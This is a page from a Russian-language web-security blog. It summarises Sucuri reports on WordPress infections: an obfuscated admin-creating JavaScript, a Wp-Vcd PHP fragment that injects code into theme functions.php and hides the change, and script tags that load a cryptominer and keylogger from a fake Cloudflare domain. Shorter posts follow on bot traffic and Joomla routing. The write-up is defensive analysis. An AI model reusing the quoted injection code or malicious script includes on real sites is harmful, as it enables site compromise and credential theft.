БЛОГ


В этом месяце специалистами компании Sucuri необычный способ распространения зловредного кода через JavaScript из браузера посетителя. Хотя используется давно известная уязвимость не обновлённой темы News Magazine Newspaper , но метод заслуживает описания.

На уязвимые сайты загружается вредоносный код:

eval (String.fromCharCode (118, 97, 114, 32, 115, 115, 99 ...

После того, как посетитель заходит на зараженный сайт, Javascript проверяет, зарегистрирован ли посетитель в качестве администратора, обратившись к файлу /wp-admin/user-new.php в теневом режиме. Если пользователь является администратором, он создает пользователя с именем simple001 и с электронной почтой simple @ simplesite .com  с правами администратора.

Если посетитель не зарегистрирован как admin, javascript проверяет, является ли это первым посещением за последние десять часов (проверяя файл cookie checkmeonce), а затем перенаправляет на адрес hxxps: //for.stringengines [.] Com /sp.php?at=57&bc=345&rps=5467854&sty=457&get=75 .

Этот URL-адрес промежуточный в  цепочке перенаправления на фишинговые и сайты рекламного содержания. Перенаправления, как правило, на один и тот же сайт делается один раз, чаще всего на домены в зоне  .tk обозначенными как  «техническая поддержка» и случайными символами в имени домена, такими как 3cal1ingc0nstant31112123 [.] Tk или techsupport60512123456 [.] Tk .

Новая атака зафиксированная в конце ноября. Для атаки используется уже известный Wp-Vcd yj но методы распространения претерпели некоторый изменения.

Так с помощью кода:

if ($ content = file_get_contents ($ themes. DIRECTORY_SEPARATOR. $ _. DIRECTORY_SEPARATOR. 'functions.php')) {
  if (strpos ($ content, 'WP_V_CD') === false) {
  $ content = $ install_code.  $ content;
  @file_put_contents ($ themes. DIRECTORY_SEPARATOR. $ _. DIRECTORY_SEPARATOR. 'functions.php', $ content);
  touch ($ themes. DIRECTORY_SEPARATOR. $ _. DIRECTORY_SEPARATOR. 'functions.php', $ time);
  }
  else {$ ping = false;  }
  }

сбрасывается дата изменения файла,  затем в базу загружается содержимое удаленного txt-файла с  именами хостов и паролями инъекций кода.

К вредоносному скрипту криптомайнинга cloudflare.solutions, который несколько недель назад был обнаружен специалистами Sucuri, добавлена новая функция кейлогера.

Вводная часть этой вредоносной программы вообще не изменилась, и использует function.php , чтобы вызвать следующие сценарии на страницах WordPress:

 

<script type = 'text / javascript' src = 'hxxp: // cloudflare [.] solutions /ajax/libs/reconnecting-websocket/1.0.0/reconnecting-websocket.js'> </ script>

 <script type = 'text / javascript' src = 'hxxp: // cloudflare [.] solutions /ajax/libs/cors/cors.js'> </ script>

 

URL-адреса сценариев также совпадают, однако они используют поддельный домен CloudFlare. Первая  (reconnecting-websocket.js) по-прежнему загружает копию законной библиотеки ReconnectingWebSocket .

Основное изменение - скрипт cors.js. Теперь, после его декодирования там нет абсолютно подозрительного кода. Также скрипт загружает Яндекс Метрику, скорее всего, это делается для отслеживания зараженных сайтов. Кстати, идентификатор  этого Яндекс скрипта - 43930119 - его можно найти в HTML-коде главной страницы.

Проблема ботов сейчас очень актуальна в нынешних интернетах.


Боты могут забивать комментариями сайт, причем иногда с такой скоростью, что, даже проводя по 24 часа за удалением, все равно не справиться с волной спама.

Кто-то запустил сканирование большого диапазона IP-адресов на уязвимость, «сыпется» множество запросов, возрастает нагрузка хостинг, сайт загружает страницы по нескольку секунд, клиенты теряют терпение и уходят к конкурентам. А если большая часть вашего бизнеса держится на заявках с сайта?

Близится Новый год и Первое сентября, вы предварительно запаслись товаром и стоите «на старте», сезон всего две-три недели, и тут на сайт обрушивается DDoS-атака, а сайт – это единственная площадка для реализации продукции. Практически это то же самое, что, придя в магазин, вы обнаруживаете его закрытым.

Несколько лет назад проблема легко решалась установкой скриптов типа IPSecure, но современные боты научились «обходить» некоторые виды капчи, динамически менять IP-адреса, что не удивительно, поскольку разработчики ботов тоже хотят кушать и постоянно развивают и совершенствуют свои инструменты.

В CMS Joomla, начиная с версии 3.8, введена новая версия маршрутизации (route).  Функция несет улучшения в СЕО возможности, как появление дублей страниц, обработка ошибок 404, из url удалены id материалов.

По умолчанию, даже при новой установке роутер выключен, поэтому, даже обновив Joomla, вы не увидите изменений. Маршрутизация включается  для каждого компонента отдельно, и не все компоненты ее пока поддерживают, так например я не увидел этой возможности в К2, что вернее всего, будет исправлено в ближайших версиях.

Включаем роутер

Переходим, материалы – менеджер материалов – настройки (в правом верхнем углу), далее вкладка – интеграция.

Выбираем:

Маршрутизация URL - экспериментальный

Удалить идентификаторы из URL – если вы делает новый сайт, то включать. Если сайт уже проиндексирован, то можно оставить выключенным, роутер поддерживает оба варианта.

Страница 4 из 8